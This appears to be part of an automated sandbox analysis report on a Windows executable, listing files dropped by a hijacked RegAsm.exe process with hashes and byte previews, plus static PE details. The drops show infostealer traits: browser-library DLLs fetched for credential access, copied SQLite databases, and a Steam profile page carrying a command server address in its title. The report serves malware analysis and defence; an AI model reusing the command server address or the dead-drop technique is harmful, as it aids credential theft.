SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DAAAKFHIEGDGCAAAEGDG

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GIJEBKECBAKFBGDGCBGDBAECAK

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HCBFIJJE

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HCFBAFIDAECA\freebl3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: JHqNlw9U8c.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: QPoX60yhZt.exe, Detection: malicious, Browse Filename: 3R18jv6iGv.exe, Detection: malicious, Browse Filename: YEnIrzZUUw.exe, Detection: malicious, Browse Filename: bUcIhJ4VHm.exe, Detection: malicious, Browse Filename: w3WOJ1ohgD.exe, Detection: malicious, Browse Filename: R0hb7jyBcv.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HCFBAFIDAECA\mozglue.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: JHqNlw9U8c.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: QPoX60yhZt.exe, Detection: malicious, Browse Filename: 3R18jv6iGv.exe, Detection: malicious, Browse Filename: YEnIrzZUUw.exe, Detection: malicious, Browse Filename: bUcIhJ4VHm.exe, Detection: malicious, Browse Filename: w3WOJ1ohgD.exe, Detection: malicious, Browse Filename: R0hb7jyBcv.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HCFBAFIDAECA\msvcp140.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\HCFBAFIDAECA\nss3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HCFBAFIDAECA\softokn3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HCFBAFIDAECA\vcruntime140.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KJJECGHJ

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:	96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KJJECGHJDBFIJJJKEHCB

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199677575543[1].htm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (2969), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	33805
Entropy (8bit):	5.436645502317116
Encrypted:	false
SSDEEP:	768:ndpqm+0Iz3YAA9CWG+WfcDAgZ4VWBCW3KI8iCfJkPVoEAd2Z4VWBCW3KI8iKh2SV:nd8m+0Iz3YAA9CWG+WFgZ4VWBCW3KI8X
MD5:	EC20271026EA4573606A59F3C6055E88
SHA1:	55737E577C2F25F32576FED5046D932FE063643D
SHA-256:	58536C257BB5486D0D52777B1F73D3186BF2B3B65BE17F9C05D9403B531A35C3
SHA-512:	E9FD38D8314BF22769FBE32A324D68F28BDB88DE2A33777035909DC9B97BDAB02F3FEC7F5BB5701D8443716406C37F66996F7657CDF43B68CF5DEF5FD823583F
Malicious:	false
Preview:	<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: nve7n2 https://95.217.246.168\|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english" rel="stylesheet" type="text/css" >.<link

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqln[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2459136
Entropy (8bit):	6.052474106868353
Encrypted:	false
SSDEEP:	49152:WHoJ9zGioiMjW2RrL9B8SSpiCH7cuez9A:WHoJBGqabRnj8JY/9
MD5:	90E744829865D57082A7F452EDC90DE5
SHA1:	833B178775F39675FA4E55EAB1032353514E1052
SHA-256:	036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
SHA-512:	0A2D112FF7CB806A74F5EC17FE097D28107BB497D6ED5AD28EA47E6795434BA903CDB49AAF97A9A99C08CD0411F1969CAD93031246DC107C26606A898E570323
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........7.Z.Y.Z.Y.Z.Y...Z.n.Y...\..Y...]...Y...X.Y.Y.Z.X..Y.O.\.E.Y.O.].U.Y.O.Z.L.Y.l3].[.Y.l3Y.[.Y.l3..[.Y.l3[.[.Y.RichZ.Y.................PE..L...i.`e...........!...%.. .........{D........ ...............................%...........@...........................#..6....$.(.....$.......................$.....`.#.8...........................x.#.@.............$..............................text...G. ....... ................. ..`.rdata...".... ..$.... .............@..@.data...4\|... $..b....#.............@....idata........$......^$.............@..@.00cfg........$......p$.............@..@.rsrc.........$......r$.............@..@.reloc..5.....$.......$.............@..B................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit):	7.540546430535817
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	409'600 bytes
MD5:	5cab81fae61cb23017cc6c6eb6a7e433
SHA1:	e7c299b308a01f140dc54496e20d87583d70a665
SHA256:	4af66ae63601052bcac5f6a91d0d5be8469dedcb7e64cedc99afee7f8b44c7ac
SHA512:	b033bb715d387a0f130453822138b7943a8f93a8fca20fbc115e8a82250e16ef7e5e8511f6db54da5f915dea6c92c2b6e8b8cfabf8a0a14d46e4ebf6b9d8ecc0
SSDEEP:	12288:Xdy0t/5TvlNOThfN3TkbZdjjsYuo0C5pIs+y:x/5jl+7j4hjsY7J5Sr
TLSH:	2994E012B5C08073D57325310AF4EBB89E7EF9710B669A9F97D40F6F4F302818A25A67
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................... ....... ..._... ....... ...............1.......1.......1.................s.............Rich............PE..L..

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4068ee
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x662BF761 [Fri Apr 26 18:50:09 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	17c87c2ceba06a933957d5cd67f1cd22

Entrypoint Preview

Instruction
call 00007F5830D01925h
jmp 00007F5830D010B9h
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
push esi
mov ecx, dword ptr [eax+3Ch]
add ecx, eax
movzx eax, word ptr [ecx+14h]
lea edx, dword ptr [ecx+18h]
add edx, eax
movzx eax, word ptr [ecx+06h]
imul esi, eax, 28h
add esi, edx
cmp edx, esi
je 00007F5830D0125Bh
mov ecx, dword ptr [ebp+0Ch]
cmp ecx, dword ptr [edx+0Ch]
jc 00007F5830D0124Ch
mov eax, dword ptr [edx+08h]
